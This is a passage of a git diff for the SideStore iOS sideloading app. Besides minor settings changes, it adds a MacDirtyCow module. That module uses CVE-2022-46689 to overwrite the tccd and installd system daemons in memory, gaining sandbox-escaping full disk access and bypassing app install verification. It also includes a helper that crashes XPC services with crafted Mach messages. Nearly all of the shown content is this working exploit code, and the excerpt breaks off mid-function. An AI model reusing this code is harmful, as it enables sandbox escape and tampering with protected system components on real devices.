                     let toastView = ToastView(text: NSLocalizedString("Cannot Send Mail", comment: ""), detailText: nil)
                     toastView.show(in: self)
                 }
+                
+            case .clearCache: self.clearCache()
+
             case .resetPairingFile:
                 let filename = "ALTPairingFile.mobiledevicepairing"
                 let fm = FileManager.default
@@ -559,6 +669,7 @@ extension SettingsViewController
                     ELOG("UIApplication.openSettingsURLString invalid")
                 }
             case .refreshAttempts, .errorLog: break
+
             }
             
         default: break

AltStoreCore/Extensions/UserDefaults+AltStore.swift

@@ -27,9 +27,10 @@ public extension UserDefaults
     @NSManaged var preferredServerID: String?
     
     @NSManaged var isBackgroundRefreshEnabled: Bool
+    @NSManaged var isIdleTimeoutDisableEnabled: Bool
     @NSManaged var isDebugModeEnabled: Bool
     @NSManaged var presentedLaunchReminderNotification: Bool
-    
+    @NSManaged var isMDCEnabled: Bool
     @NSManaged var legacySideloadedApps: [String]?
     
     @NSManaged var isLegacyDeactivationSupported: Bool
@@ -72,6 +73,7 @@ public extension UserDefaults
         
         let defaults = [
             #keyPath(UserDefaults.isBackgroundRefreshEnabled): true,
+            #keyPath(UserDefaults.isIdleTimeoutDisableEnabled): true,
             #keyPath(UserDefaults.isLegacyDeactivationSupported): isLegacyDeactivationSupported,
             #keyPath(UserDefaults.activeAppLimitIncludesExtensions): activeAppLimitIncludesExtensions,
             #keyPath(UserDefaults.localServerSupportsRefreshing): localServerSupportsRefreshing,

AltWidget/Info.plist

@@ -4,8 +4,8 @@
 <dict>
 	<key>ALTAppGroups</key>
 	<array>
-		<string>group.com.SideStore.SideStore</string>
 		<string>group.$(APP_GROUP_IDENTIFIER)</string>
+		<string>group.com.SideStore.SideStore</string>
 	</array>
 	<key>CFBundleDevelopmentRegion</key>
 	<string>$(DEVELOPMENT_LANGUAGE)</string>

Build.xcconfig

@@ -1,8 +1,8 @@
 // Configuration settings file format documentation can be found at:
 // https://help.apple.com/xcode/#/dev745c5c974
 
-MARKETING_VERSION = 0.5.1
-CURRENT_PROJECT_VERSION = 5010
+MARKETING_VERSION = 0.5.5
+CURRENT_PROJECT_VERSION = 5050
 
 // Vars to be overwritten by `CodeSigning.xcconfig` if exists
 DEVELOPMENT_TEAM = S32Z3HMYVQ

MacDirtyCow/MacDirtyCow.h

@@ -0,0 +1,21 @@
+//
+//  MacDirtyCow.h
+//  MacDirtyCow
+//
+//  Created by June P on 2023/11/28.
+//  Copyright © 2023 SideStore. All rights reserved.
+//
+
+#import <Foundation/Foundation.h>
+
+//! Project version number for MacDirtyCow.
+FOUNDATION_EXPORT double MacDirtyCowVersionNumber;
+
+//! Project version string for MacDirtyCow.
+FOUNDATION_EXPORT const unsigned char MacDirtyCowVersionString[];
+
+// In this header, you should import all the public headers of your framework using statements like #import <MacDirtyCow/PublicHeader.h>
+
+#include "grant_full_disk_access.h"
+#include "helpers.h"
+#include "vm_unaligned_copy_switch_race.h"

MacDirtyCow/grant_full_disk_access.h

@@ -0,0 +1,16 @@
+//
+//  grant_full_disk_access.h
+//  AltStore
+//
+//  Created by June P on 2023/11/28.
+//  Copyright © 2023 SideStore. All rights reserved.
+//
+
+#ifndef grant_full_disk_access_h
+#define grant_full_disk_access_h
+@import Foundation;
+
+/// Uses CVE-2022-46689 to grant the current app read/write access outside the sandbox.
+void grant_full_disk_access(void (^_Nonnull completion)(NSError* _Nullable));
+bool patch_installd(void);
+#endif /* grant_full_disk_access_h */

MacDirtyCow/grant_full_disk_access.m

@@ -0,0 +1,618 @@
+//
+//  grant_full_disk_access.m
+//  MacDirtyCow
+//
+//  Created by June P on 2023/11/28.
+//  Copyright © 2023 SideStore. All rights reserved.
+//
+
+@import Darwin;
+@import Foundation;
+@import MachO;
+
+#import <mach-o/fixup-chains.h>
+// you'll need helpers.m from Ian Beer's write_no_write and vm_unaligned_copy_switch_race.m from
+// WDBFontOverwrite
+// Also, set an NSAppleMusicUsageDescription in Info.plist (can be anything)
+// Please don't call this code on iOS 14 or below
+// (This temporarily overwrites tccd, and on iOS 14 and above changes do not revert on reboot)
+#import "grant_full_disk_access.h"
+#import "helpers.h"
+#import "vm_unaligned_copy_switch_race.h"
+
+typedef NSObject* xpc_object_t;
+typedef xpc_object_t xpc_connection_t;
+typedef void (^xpc_handler_t)(xpc_object_t object);
+xpc_object_t xpc_dictionary_create(const char* const _Nonnull* keys,
+                                   xpc_object_t _Nullable const* values, size_t count);
+xpc_connection_t xpc_connection_create_mach_service(const char* name, dispatch_queue_t targetq,
+                                                    uint64_t flags);
+void xpc_connection_set_event_handler(xpc_connection_t connection, xpc_handler_t handler);
+void xpc_connection_resume(xpc_connection_t connection);
+void xpc_connection_send_message_with_reply(xpc_connection_t connection, xpc_object_t message,
+                                            dispatch_queue_t replyq, xpc_handler_t handler);
+xpc_object_t xpc_connection_send_message_with_reply_sync(xpc_connection_t connection,
+                                                         xpc_object_t message);
+xpc_object_t xpc_bool_create(bool value);
+xpc_object_t xpc_string_create(const char* string);
+xpc_object_t xpc_null_create(void);
+const char* xpc_dictionary_get_string(xpc_object_t xdict, const char* key);
+
+int64_t sandbox_extension_consume(const char* token);
+
+// MARK: - patchfind
+
+struct grant_full_disk_access_offsets {
+  uint64_t offset_addr_s_com_apple_tcc_;
+  uint64_t offset_padding_space_for_read_write_string;
+  uint64_t offset_addr_s_kTCCServiceMediaLibrary;
+  uint64_t offset_auth_got__sandbox_init;
+  uint64_t offset_just_return_0;
+  bool is_arm64e;
+};
+
+static bool patchfind_sections(void* executable_map,
+                               struct segment_command_64** data_const_segment_out,
+                               struct symtab_command** symtab_out,
+                               struct dysymtab_command** dysymtab_out) {
+  struct mach_header_64* executable_header = executable_map;
+  struct load_command* load_command = executable_map + sizeof(struct mach_header_64);
+  for (int load_command_index = 0; load_command_index < executable_header->ncmds;
+       load_command_index++) {
+    switch (load_command->cmd) {
+      case LC_SEGMENT_64: {
+        struct segment_command_64* segment = (struct segment_command_64*)load_command;
+        if (strcmp(segment->segname, "__DATA_CONST") == 0) {
+          *data_const_segment_out = segment;
+        }
+        break;
+      }
+      case LC_SYMTAB: {
+        *symtab_out = (struct symtab_command*)load_command;
+        break;
+      }
+      case LC_DYSYMTAB: {
+        *dysymtab_out = (struct dysymtab_command*)load_command;
+        break;
+      }
+    }
+    load_command = ((void*)load_command) + load_command->cmdsize;
+  }
+  return true;
+}
+
+static uint64_t patchfind_get_padding(struct segment_command_64* segment) {
+  struct section_64* section_array = ((void*)segment) + sizeof(struct segment_command_64);
+  struct section_64* last_section = &section_array[segment->nsects - 1];
+  return last_section->offset + last_section->size;
+}
+
+static uint64_t patchfind_pointer_to_string(void* executable_map, size_t executable_length,
+                                            const char* needle) {
+  void* str_offset = memmem(executable_map, executable_length, needle, strlen(needle) + 1);
+  if (!str_offset) {
+    return 0;
+  }
+  uint64_t str_file_offset = str_offset - executable_map;
+  for (int i = 0; i < executable_length; i += 8) {
+    uint64_t val = *(uint64_t*)(executable_map + i);
+    if ((val & 0xfffffffful) == str_file_offset) {
+      return i;
+    }
+  }
+  return 0;
+}
+
+static uint64_t patchfind_return_0(void* executable_map, size_t executable_length) {
+  // TCCDSyncAccessAction::sequencer
+  // mov x0, #0
+  // ret
+  static const char needle[] = {0x00, 0x00, 0x80, 0xd2, 0xc0, 0x03, 0x5f, 0xd6};
+  void* offset = memmem(executable_map, executable_length, needle, sizeof(needle));
+  if (!offset) {
+    return 0;
+  }
+  return offset - executable_map;
+}
+
+static uint64_t patchfind_got(void* executable_map, size_t executable_length,
+                              struct segment_command_64* data_const_segment,
+                              struct symtab_command* symtab_command,
+                              struct dysymtab_command* dysymtab_command,
+                              const char* target_symbol_name) {
+  uint64_t target_symbol_index = 0;
+  for (int sym_index = 0; sym_index < symtab_command->nsyms; sym_index++) {
+    struct nlist_64* sym =
+        ((struct nlist_64*)(executable_map + symtab_command->symoff)) + sym_index;
+    const char* sym_name = executable_map + symtab_command->stroff + sym->n_un.n_strx;
+    if (strcmp(sym_name, target_symbol_name)) {
+      continue;
+    }
+    // printf("%d %llx\n", sym_index, (uint64_t)(((void*)sym) - executable_map));
+    target_symbol_index = sym_index;
+    break;
+  }
+
+  struct section_64* section_array =
+      ((void*)data_const_segment) + sizeof(struct segment_command_64);
+  struct section_64* first_section = &section_array[0];
+  if (!(strcmp(first_section->sectname, "__auth_got") == 0 ||
+        strcmp(first_section->sectname, "__got") == 0)) {
+    return 0;
+  }
+  uint32_t* indirect_table = executable_map + dysymtab_command->indirectsymoff;
+
+  for (int i = 0; i < first_section->size; i += 8) {
+    uint64_t val = *(uint64_t*)(executable_map + first_section->offset + i);
+    uint64_t indirect_table_entry = (val & 0xfffful);
+    if (indirect_table[first_section->reserved1 + indirect_table_entry] == target_symbol_index) {
+      return first_section->offset + i;
+    }
+  }
+  return 0;
+}
+
+static bool patchfind(void* executable_map, size_t executable_length,
+                      struct grant_full_disk_access_offsets* offsets) {
+  struct segment_command_64* data_const_segment = nil;
+  struct symtab_command* symtab_command = nil;
+  struct dysymtab_command* dysymtab_command = nil;
+  if (!patchfind_sections(executable_map, &data_const_segment, &symtab_command,
+                          &dysymtab_command)) {
+    printf("no sections\n");
+    return false;
+  }
+  if ((offsets->offset_addr_s_com_apple_tcc_ =
+           patchfind_pointer_to_string(executable_map, executable_length, "com.apple.tcc.")) == 0) {
+    printf("no com.apple.tcc. string\n");
+    return false;
+  }
+  if ((offsets->offset_padding_space_for_read_write_string =
+           patchfind_get_padding(data_const_segment)) == 0) {
+    printf("no padding\n");
+    return false;
+  }
+  if ((offsets->offset_addr_s_kTCCServiceMediaLibrary = patchfind_pointer_to_string(
+           executable_map, executable_length, "kTCCServiceMediaLibrary")) == 0) {
+    printf("no kTCCServiceMediaLibrary string\n");
+    return false;
+  }
+  if ((offsets->offset_auth_got__sandbox_init =
+           patchfind_got(executable_map, executable_length, data_const_segment, symtab_command,
+                         dysymtab_command, "_sandbox_init")) == 0) {
+    printf("no sandbox_init\n");
+    return false;
+  }
+  if ((offsets->offset_just_return_0 = patchfind_return_0(executable_map, executable_length)) ==
+      0) {
+    printf("no just return 0\n");
+    return false;
+  }
+  struct mach_header_64* executable_header = executable_map;
+  offsets->is_arm64e = (executable_header->cpusubtype & ~CPU_SUBTYPE_MASK) == CPU_SUBTYPE_ARM64E;
+
+  return true;
+}
+
+// MARK: - tccd patching
+
+static void call_tccd(void (^completion)(NSString* _Nullable extension_token)) {
+  // reimplmentation of TCCAccessRequest, as we need to grab and cache the sandbox token so we can
+  // re-use it until next reboot.
+  // Returns the sandbox token if there is one, or nil if there isn't one.
+  xpc_connection_t connection = xpc_connection_create_mach_service(
+      "com.apple.tccd", dispatch_get_global_queue(QOS_CLASS_USER_INITIATED, 0), 0);
+  xpc_connection_set_event_handler(connection, ^(xpc_object_t object) {
+    NSLog(@"xpc event handler: %@", object);
+  });
+  xpc_connection_resume(connection);
+  const char* keys[] = {
+      "TCCD_MSG_ID",  "function",           "service", "require_purpose", "preflight",
+      "target_token", "background_session",
+  };
+  xpc_object_t values[] = {
+      xpc_string_create("17087.1"),
+      xpc_string_create("TCCAccessRequest"),
+      xpc_string_create("com.apple.app-sandbox.read-write"),
+      xpc_null_create(),
+      xpc_bool_create(false),
+      xpc_null_create(),
+      xpc_bool_create(false),
+  };
+  xpc_object_t request_message = xpc_dictionary_create(keys, values, sizeof(keys) / sizeof(*keys));
+#if 0
+  xpc_object_t response_message = xpc_connection_send_message_with_reply_sync(connection, request_message);
+  NSLog(@"%@", response_message);
+
+#endif
+  xpc_connection_send_message_with_reply(
+      connection, request_message, dispatch_get_global_queue(QOS_CLASS_USER_INITIATED, 0),
+      ^(xpc_object_t object) {
+        if (!object) {
+          NSLog(@"object is nil???");
+          completion(nil);
+          return;
+        }
+        NSLog(@"response: %@", object);
+        if ([object isKindOfClass:NSClassFromString(@"OS_xpc_error")]) {
+          NSLog(@"xpc error?");
+          completion(nil);
+          return;
+        }
+        NSLog(@"debug description: %@", [object debugDescription]);
+        const char* extension_string = xpc_dictionary_get_string(object, "extension");
+        NSString* extension_nsstring =
+            extension_string ? [NSString stringWithUTF8String:extension_string] : nil;
+        completion(extension_nsstring);
+      });
+}
+
+static NSData* patchTCCD(void* executableMap, size_t executableLength) {
+  struct grant_full_disk_access_offsets offsets = {};
+  if (!patchfind(executableMap, executableLength, &offsets)) {
+    return nil;
+  }
+
+  NSMutableData* data = [NSMutableData dataWithBytes:executableMap length:executableLength];
+  // strcpy(data.mutableBytes, "com.apple.app-sandbox.read-write", sizeOfStr);
+  char* mutableBytes = data.mutableBytes;
+  {
+    // rewrite com.apple.tcc. into blank string
+    *(uint64_t*)(mutableBytes + offsets.offset_addr_s_com_apple_tcc_ + 8) = 0;
+  }
+  {
+    // make offset_addr_s_kTCCServiceMediaLibrary point to "com.apple.app-sandbox.read-write"
+    // we need to stick this somewhere; just put it in the padding between
+    // the end of __objc_arrayobj and the end of __DATA_CONST
+    strcpy((char*)(data.mutableBytes + offsets.offset_padding_space_for_read_write_string),
+           "com.apple.app-sandbox.read-write");
+    struct dyld_chained_ptr_arm64e_rebase targetRebase =
+        *(struct dyld_chained_ptr_arm64e_rebase*)(mutableBytes +
+                                                  offsets.offset_addr_s_kTCCServiceMediaLibrary);
+    targetRebase.target = offsets.offset_padding_space_for_read_write_string;
+    *(struct dyld_chained_ptr_arm64e_rebase*)(mutableBytes +
+                                              offsets.offset_addr_s_kTCCServiceMediaLibrary) =
+        targetRebase;
+    *(uint64_t*)(mutableBytes + offsets.offset_addr_s_kTCCServiceMediaLibrary + 8) =
+        strlen("com.apple.app-sandbox.read-write");
+  }
+  if (offsets.is_arm64e) {
+    // make sandbox_init call return 0;
+    struct dyld_chained_ptr_arm64e_auth_rebase targetRebase = {
+        .auth = 1,
+        .bind = 0,
+        .next = 1,
+        .key = 0,  // IA
+        .addrDiv = 1,
+        .diversity = 0,
+        .target = offsets.offset_just_return_0,
+    };
+    *(struct dyld_chained_ptr_arm64e_auth_rebase*)(mutableBytes +
+                                                   offsets.offset_auth_got__sandbox_init) =
+        targetRebase;
+  } else {
+    // make sandbox_init call return 0;
+    struct dyld_chained_ptr_64_rebase targetRebase = {
+        .bind = 0,
+        .next = 2,
+        .target = offsets.offset_just_return_0,
+    };
+    *(struct dyld_chained_ptr_64_rebase*)(mutableBytes + offsets.offset_auth_got__sandbox_init) =
+        targetRebase;
+  }
+  return data;
+}
+
+static bool overwrite_file(int fd, NSData* sourceData) {
+  for (int off = 0; off < sourceData.length; off += 0x4000) {
+    bool success = false;
+    for (int i = 0; i < 2; i++) {
+      if (unaligned_copy_switch_race(
+              fd, off, sourceData.bytes + off,
+              off + 0x4000 > sourceData.length ? sourceData.length - off : 0x4000)) {
+        success = true;
+        break;
+      }
+    }
+    if (!success) {
+      return false;
+    }
+  }
+  return true;
+}
+
+static void grant_full_disk_access_impl(void (^completion)(NSString* extension_token,
+                                                           NSError* _Nullable error)) {
+  char* targetPath = "/System/Library/PrivateFrameworks/TCC.framework/Support/tccd";
+  int fd = open(targetPath, O_RDONLY | O_CLOEXEC);
+  if (fd == -1) {
+    // iOS 15.3 and below
+    targetPath = "/System/Library/PrivateFrameworks/TCC.framework/tccd";
+    fd = open(targetPath, O_RDONLY | O_CLOEXEC);
+  }
+  off_t targetLength = lseek(fd, 0, SEEK_END);
+  lseek(fd, 0, SEEK_SET);
+  void* targetMap = mmap(nil, targetLength, PROT_READ, MAP_SHARED, fd, 0);
+
+  NSData* originalData = [NSData dataWithBytes:targetMap length:targetLength];
+  NSData* sourceData = patchTCCD(targetMap, targetLength);
+  if (!sourceData) {
+    completion(nil, [NSError errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
+                                        code:5
+                                    userInfo:@{NSLocalizedDescriptionKey : @"Can't patchfind."}]);
+    return;
+  }
+
+  if (!overwrite_file(fd, sourceData)) {
+    overwrite_file(fd, originalData);
+    munmap(targetMap, targetLength);
+    completion(
+        nil, [NSError errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
+                                 code:1
+                             userInfo:@{
+                               NSLocalizedDescriptionKey : @"Can't overwrite file: your device may "
+                                                           @"not be vulnerable to CVE-2022-46689."
+                             }]);
+    return;
+  }
+  munmap(targetMap, targetLength);
+
+  xpc_crasher("com.apple.tccd");
+  sleep(1);
+  call_tccd(^(NSString* _Nullable extension_token) {
+    overwrite_file(fd, originalData);
+    xpc_crasher("com.apple.tccd");
+    NSError* returnError = nil;
+    if (extension_token == nil) {
+      returnError =
+          [NSError errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
+                              code:2
+                          userInfo:@{
+                            NSLocalizedDescriptionKey : @"tccd did not return an extension token."
+                          }];
+    } else if (![extension_token containsString:@"com.apple.app-sandbox.read-write"]) {
+      returnError = [NSError
+          errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
+                     code:3
+                 userInfo:@{
+                   NSLocalizedDescriptionKey : @"tccd patch failed: returned a media library token "
+                                               @"instead of an app sandbox token."
+                 }];
+      extension_token = nil;
+    }
+    completion(extension_token, returnError);
+  });
+}
+
+void grant_full_disk_access(void (^completion)(NSError* _Nullable)) {
+  if (!NSClassFromString(@"NSPresentationIntent")) {
+    // class introduced in iOS 15.0.
+    // TODO(zhuowei): maybe check the actual OS version instead?
+    completion([NSError
+        errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
+                   code:6
+               userInfo:@{
+                 NSLocalizedDescriptionKey :
+                     @"Not supported on iOS 14 and below: on iOS 14 the system partition is not "
+                     @"reverted after reboot, so running this may permanently corrupt tccd."
+               }]);
+    return;
+  }
+  NSURL* documentDirectory = [NSFileManager.defaultManager URLsForDirectory:NSDocumentDirectory
+                                                                  inDomains:NSUserDomainMask][0];
+  NSURL* sourceURL =
+      [documentDirectory URLByAppendingPathComponent:@"full_disk_access_sandbox_token.txt"];
+  NSError* error = nil;
+  NSString* cachedToken = [NSString stringWithContentsOfURL:sourceURL
+                                                   encoding:NSUTF8StringEncoding
+                                                      error:&error];
+  if (cachedToken) {
+    int64_t handle = sandbox_extension_consume(cachedToken.UTF8String);
+    if (handle > 0) {
+      // cached version worked
+      completion(nil);
+      return;
+    }
+  }
+  grant_full_disk_access_impl(^(NSString* extension_token, NSError* _Nullable error) {
+    if (error) {
+      completion(error);
+      return;
+    }
+    int64_t handle = sandbox_extension_consume(extension_token.UTF8String);
+    if (handle <= 0) {
+      completion([NSError
+          errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
+                     code:4
+                 userInfo:@{NSLocalizedDescriptionKey : @"Failed to consume generated extension"}]);
+      return;
+    }
+    [extension_token writeToURL:sourceURL
+                     atomically:true
+                       encoding:NSUTF8StringEncoding
+                          error:&error];
+    completion(nil);
+  });
+}
+
+/// MARK - installd patch
+
+struct installd_remove_app_limit_offsets {
+  uint64_t offset_objc_method_list_t_MIInstallableBundle;
+  uint64_t offset_objc_class_rw_t_MIInstallableBundle_baseMethods;
+  uint64_t offset_data_const_end_padding;
+  // MIUninstallRecord::supportsSecureCoding
+  uint64_t offset_return_true;
+};
+
+struct installd_remove_app_limit_offsets gAppLimitOffsets = {
+    .offset_objc_method_list_t_MIInstallableBundle = 0x519b0,
+    .offset_objc_class_rw_t_MIInstallableBundle_baseMethods = 0x804e8,
+    .offset_data_const_end_padding = 0x79c38,
+    .offset_return_true = 0x19860,
+};
+
+static uint64_t patchfind_find_class_rw_t_baseMethods(void* executable_map,
+                                                      size_t executable_length,
+                                                      const char* needle) {
+  void* str_offset = memmem(executable_map, executable_length, needle, strlen(needle) + 1);
+  if (!str_offset) {
+    return 0;
+  }
+  uint64_t str_file_offset = str_offset - executable_map;
+  for (int i = 0; i < executable_length - 8; i += 8) {
+    uint64_t val = *(uint64_t*)(executable_map + i);
+    if ((val & 0xfffffffful) != str_file_offset) {
+      continue;
+    }
+    // baseMethods
+    if (*(uint64_t*)(executable_map + i + 8) != 0) {
+      return i + 8;
+    }
+  }
+  return 0;
+}
+
+static uint64_t patchfind_return_true(void* executable_map, size_t executable_length) {
+  // mov w0, #1
+  // ret
+  static const char needle[] = {0x20, 0x00, 0x80, 0x52, 0xc0, 0x03, 0x5f, 0xd6};
+  void* offset = memmem(executable_map, executable_length, needle, sizeof(needle));
+  if (!offset) {
+    return 0;
+  }
+  return offset - executable_map;
+}
+
+static bool patchfind_installd(void* executable_map, size_t executable_length,
+                               struct installd_remove_app_limit_offsets* offsets) {
+  struct segment_command_64* data_const_segment = nil;
+  struct symtab_command* symtab_command = nil;
+  struct dysymtab_command* dysymtab_command = nil;
+  if (!patchfind_sections(executable_map, &data_const_segment, &symtab_command,
+                          &dysymtab_command)) {
+    printf("no sections\n");
+    return false;
+  }
+  if ((offsets->offset_data_const_end_padding = patchfind_get_padding(data_const_segment)) == 0) {
+    printf("no padding\n");
+    return false;
+  }
+  if ((offsets->offset_objc_class_rw_t_MIInstallableBundle_baseMethods =
+           patchfind_find_class_rw_t_baseMethods(executable_map, executable_length,
+                                                 "MIInstallableBundle")) == 0) {
+    printf("no MIInstallableBundle class_rw_t\n");
+    return false;
+  }
+  offsets->offset_objc_method_list_t_MIInstallableBundle =
+      (*(uint64_t*)(executable_map +
+                    offsets->offset_objc_class_rw_t_MIInstallableBundle_baseMethods)) &
+      0xffffffull;
+
+  if ((offsets->offset_return_true = patchfind_return_true(executable_map, executable_length)) ==
+      0) {
+    printf("no return true\n");
+    return false;
+  }
+  return true;
+}
+
+struct objc_method {
+  int32_t name;
+  int32_t types;
+  int32_t imp;
+};
+
+struct objc_method_list {
+  uint32_t entsizeAndFlags;
+  uint32_t count;
+  struct objc_method methods[];
+};
+
+static void patch_copy_objc_method_list(void* mutableBytes, uint64_t old_offset,
+                                        uint64_t new_offset, uint64_t* out_copied_length,
+                                        void (^callback)(const char* sel,
+                                                         uint64_t* inout_function_pointer)) {
+  struct objc_method_list* original_list = mutableBytes + old_offset;
+  struct objc_method_list* new_list = mutableBytes + new_offset;
+  *out_copied_length =
+      sizeof(struct objc_method_list) + original_list->count * sizeof(struct objc_method);
+  new_list->entsizeAndFlags = original_list->entsizeAndFlags;
+  new_list->count = original_list->count;
+  for (int method_index = 0; method_index < original_list->count; method_index++) {
+    struct objc_method* method = &original_list->methods[method_index];
+    // Relative pointers
+    uint64_t name_file_offset = ((uint64_t)(&method->name)) - (uint64_t)mutableBytes + method->name;
+    uint64_t types_file_offset =
+        ((uint64_t)(&method->types)) - (uint64_t)mutableBytes + method->types;
+    uint64_t imp_file_offset = ((uint64_t)(&method->imp)) - (uint64_t)mutableBytes + method->imp;
+    const char* sel = mutableBytes + (*(uint64_t*)(mutableBytes + name_file_offset) & 0xffffffull);
+    callback(sel, &imp_file_offset);
+
+    struct objc_method* new_method = &new_list->methods[method_index];
+    new_method->name = (int32_t)((int64_t)name_file_offset -
+                                 (int64_t)((uint64_t)&new_method->name - (uint64_t)mutableBytes));
+    new_method->types = (int32_t)((int64_t)types_file_offset -
+                                  (int64_t)((uint64_t)&new_method->types - (uint64_t)mutableBytes));
+    new_method->imp = (int32_t)((int64_t)imp_file_offset -
+                                (int64_t)((uint64_t)&new_method->imp - (uint64_t)mutableBytes));
+  }
+};
+
+static NSData* make_patch_installd(void* executableMap, size_t executableLength) {
+  struct installd_remove_app_limit_offsets offsets = {};
+  if (!patchfind_installd(executableMap, executableLength, &offsets)) {
+    return nil;
+  }
+
+  NSMutableData* data = [NSMutableData dataWithBytes:executableMap length:executableLength];
+  char* mutableBytes = data.mutableBytes;
+  uint64_t current_empty_space = offsets.offset_data_const_end_padding;
+  uint64_t copied_size = 0;
+  uint64_t new_method_list_offset = current_empty_space;
+  patch_copy_objc_method_list(mutableBytes, offsets.offset_objc_method_list_t_MIInstallableBundle,
+                              current_empty_space, &copied_size,
+                              ^(const char* sel, uint64_t* inout_address) {
+                                if (strcmp(sel, "performVerificationWithError:") != 0) {
+                                  return;
+                                }
+                                *inout_address = offsets.offset_return_true;
+                              });
+  current_empty_space += copied_size;
+  ((struct
+    dyld_chained_ptr_arm64e_auth_rebase*)(mutableBytes +
+                                          offsets
+                                              .offset_objc_class_rw_t_MIInstallableBundle_baseMethods))
+      ->target = new_method_list_offset;
+  return data;
+}
+
+bool patch_installd() {
+  const char* targetPath = "/usr/libexec/installd";
+  int fd = open(targetPath, O_RDONLY | O_CLOEXEC);
+  off_t targetLength = lseek(fd, 0, SEEK_END);
+  lseek(fd, 0, SEEK_SET);
+  void* targetMap = mmap(nil, targetLength, PROT_READ, MAP_SHARED, fd, 0);
+
+  NSData* originalData = [NSData dataWithBytes:targetMap length:targetLength];
+  NSData* sourceData = make_patch_installd(targetMap, targetLength);
+  if (!sourceData) {
+    NSLog(@"can't patchfind");
+    return false;
+  }
+
+  if (!overwrite_file(fd, sourceData)) {
+    overwrite_file(fd, originalData);
+    munmap(targetMap, targetLength);
+    NSLog(@"can't overwrite");
+    return false;
+  }
+  munmap(targetMap, targetLength);
+  xpc_crasher("com.apple.mobile.installd");
+  sleep(1);
+
+  // TODO(zhuowei): for now we revert it once installd starts
+  // so the change will only last until when this installd exits
+  overwrite_file(fd, originalData);
+  return true;
+}

MacDirtyCow/helpers.h

@@ -0,0 +1,20 @@
+//
+//  helpers.h
+//  AltStore
+//
+//  Created by June P on 2023/11/28.
+//  Copyright © 2023 SideStore. All rights reserved.
+//
+
+#ifndef helpers_h
+#define helpers_h
+
+char* get_temp_file_path(void);
+void test_nsexpressions(void);
+char* set_up_tmp_file(void);
+
+void xpc_crasher(char* service_name);
+
+#define ROUND_DOWN_PAGE(val) (val & ~(PAGE_SIZE - 1ULL))
+
+#endif /* helpers_h */

MacDirtyCow/helpers.m

@@ -0,0 +1,138 @@
+//
+//  helpers.m
+//  MacDirtyCow
+//
+//  Created by June P on 2023/11/28.
+//  Copyright © 2023 SideStore. All rights reserved.
+//
+
+#import <Foundation/Foundation.h>
+#include <string.h>
+#include <mach/mach.h>
+#include <dirent.h>
+
+char* get_temp_file_path(void) {
+  return strdup([[NSTemporaryDirectory() stringByAppendingPathComponent:@"AAAAs"] fileSystemRepresentation]);
+}
+
+// create a read-only test file we can target:
+char* set_up_tmp_file(void) {
+  char* path = get_temp_file_path();
+  printf("path: %s\n", path);
+  
+  FILE* f = fopen(path, "w");
+  if (!f) {
+    printf("opening the tmp file failed...\n");
+    return NULL;
+  }
+  char* buf = malloc(PAGE_SIZE*10);
+  memset(buf, 'A', PAGE_SIZE*10);
+  fwrite(buf, PAGE_SIZE*10, 1, f);
+  //fclose(f);
+  return path;
+}
+
+kern_return_t
+bootstrap_look_up(mach_port_t bp, const char* service_name, mach_port_t *sp);
+
+struct xpc_w00t {
+  mach_msg_header_t hdr;
+  mach_msg_body_t body;
+  mach_msg_port_descriptor_t client_port;
+  mach_msg_port_descriptor_t reply_port;
+};
+
+mach_port_t get_send_once(mach_port_t recv) {
+  mach_port_t so = MACH_PORT_NULL;
+  mach_msg_type_name_t type = 0;
+  kern_return_t err = mach_port_extract_right(mach_task_self(), recv, MACH_MSG_TYPE_MAKE_SEND_ONCE, &so, &type);
+  if (err != KERN_SUCCESS) {
+    printf("port right extraction failed: %s\n", mach_error_string(err));
+    return MACH_PORT_NULL;
+  }
+  printf("made so: 0x%x from recv: 0x%x\n", so, recv);
+  return so;
+}
+
+// copy-pasted from an exploit I wrote in 2019...
+// still works...
+
+// (in the exploit for this: https://googleprojectzero.blogspot.com/2019/04/splitting-atoms-in-xnu.html )
+
+void xpc_crasher(char* service_name) {
+  mach_port_t client_port = MACH_PORT_NULL;
+  mach_port_t reply_port = MACH_PORT_NULL;
+
+  mach_port_t service_port = MACH_PORT_NULL;
+
+  kern_return_t err = bootstrap_look_up(bootstrap_port, service_name, &service_port);
+  if(err != KERN_SUCCESS){
+    printf("unable to look up %s\n", service_name);
+    return;
+  }
+
+  if (service_port == MACH_PORT_NULL) {
+    printf("bad service port\n");
+    return;
+  }
+
+  // allocate the client and reply port:
+  err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &client_port);
+  if (err != KERN_SUCCESS) {
+    printf("port allocation failed: %s\n", mach_error_string(err));
+    return;
+  }
+
+  mach_port_t so0 = get_send_once(client_port);
+  mach_port_t so1 = get_send_once(client_port);
+
+  // insert a send so we maintain the ability to send to this port
+  err = mach_port_insert_right(mach_task_self(), client_port, client_port, MACH_MSG_TYPE_MAKE_SEND);
+  if (err != KERN_SUCCESS) {
+    printf("port right insertion failed: %s\n", mach_error_string(err));
+    return;
+  }
+
+  err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &reply_port);
+  if (err != KERN_SUCCESS) {
+    printf("port allocation failed: %s\n", mach_error_string(err));
+    return;
+  }
+
+  struct xpc_w00t msg;
+  memset(&msg.hdr, 0, sizeof(msg));
+  msg.hdr.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX);
+  msg.hdr.msgh_size = sizeof(msg);
+  msg.hdr.msgh_remote_port = service_port;
+  msg.hdr.msgh_id   = 'w00t';
+
+  msg.body.msgh_descriptor_count = 2;
+
+  msg.client_port.name        = client_port;
+  msg.client_port.disposition = MACH_MSG_TYPE_MOVE_RECEIVE; // we still keep the send
+  msg.client_port.type        = MACH_MSG_PORT_DESCRIPTOR;
+
+  msg.reply_port.name        = reply_port;
+  msg.reply_port.disposition = MACH_MSG_TYPE_MAKE_SEND;
+  msg.reply_port.type        = MACH_MSG_PORT_DESCRIPTOR;
+
+  err = mach_msg(&msg.hdr,
+                 MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
+                 msg.hdr.msgh_size,
+                 0,
+                 MACH_PORT_NULL,
+                 MACH_MSG_TIMEOUT_NONE,
+                 MACH_PORT_NULL);
+
